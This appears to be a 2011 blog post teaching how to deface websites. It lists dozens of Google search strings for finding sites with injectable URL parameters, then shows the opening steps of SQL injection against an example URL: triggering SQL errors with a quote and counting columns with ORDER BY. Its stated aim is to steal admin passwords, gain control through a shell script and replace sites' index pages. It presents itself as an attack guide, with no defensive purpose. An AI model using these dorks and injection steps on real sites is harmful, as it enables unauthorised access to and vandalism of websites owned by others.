Search This Blog

Tuesday, March 1, 2011

Deface Websites using SQL and Php scripting

SOURCE and more info at: www.hackingexpert.com


WHAT IS DEFACEMENT??
Defacing a website simply means that we replace the index.html file of a site by our file. Now all the Users that open it will see our Page (i.e being uploaded by us).
For Defacing a website, three things that you need Most are:
1. SQL Injection(For analyzing website loops)
2. Admin Password
3. Shell Script (for getting Admin Controls)

1. Finding the Target and the Admin Password
First of all we must find out our target website. I have collected a lot of dorks i.e the vulnerability points of the websites. Some Google Searches can be awesomely utilized to find out vulnerable Websites..
Below is example of some queries..

Examples: Open the Google and copy paste these queries...
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=

Here are some More Queries (use them without quotation marks)
"add.asp?bookid="
"add_cart.asp?num="
"addcart.asp?"
"addItem.asp"
"add-to-cart.asp?ID="
"addToCart.asp?idProduct="
"addtomylist.asp?ProdId="
"adminEditProductFields.asp?
intProdID="
"advSearch_h.asp?idCategory="
"affiliate.asp?ID="
"affiliate-agreement.cfm?
storeid="
"affiliates.asp?id="
"ancillary.asp?ID="
"archive.asp?id="
"viewevent.asp?EventID="
"viewitem.asp?recor="
"viewPrd.asp?idcategory="
"ViewProduct.asp?misc="
"voteList.asp?item_ID="
"whatsnew.asp?idCategory="
"WsAncillary.asp?ID"

Now The Admin password Hacking procedure:
1). Check for vulnerability
Let's say that we have some site like this

http://www.site.com/news.php?id=5

Now to test if is vulrnable we add to the end of url ' (quote), and that would be

http://www.site.com/news.php?id=5'

so if we get some error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..." or something similar that means the Site is vulnerable to SQL injection.

2). Find the number of
columns
To find number of columns we use statement ORDER BY (tells database how to order the result) so how to use it?
Well just incrementing the number until we get an error.

http://www.site.com/news.php?id=5 order by 1/
* <-- no error

http://www.site.com/news.php?id=5 order by 2/
* <-- no error

http://www.site.com/news.php?id=5 order by 3/
* <-- no error

http://www.site.com/news.php?id=5 order by 4/
* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that)

that means that the it has 3 columns, cause we got an error on 4.

Part 1
Part 2
Part 3
Part 4
Posted by at

No comments:

New comments are not allowed.

Subscribe to: Post Comments (Atom)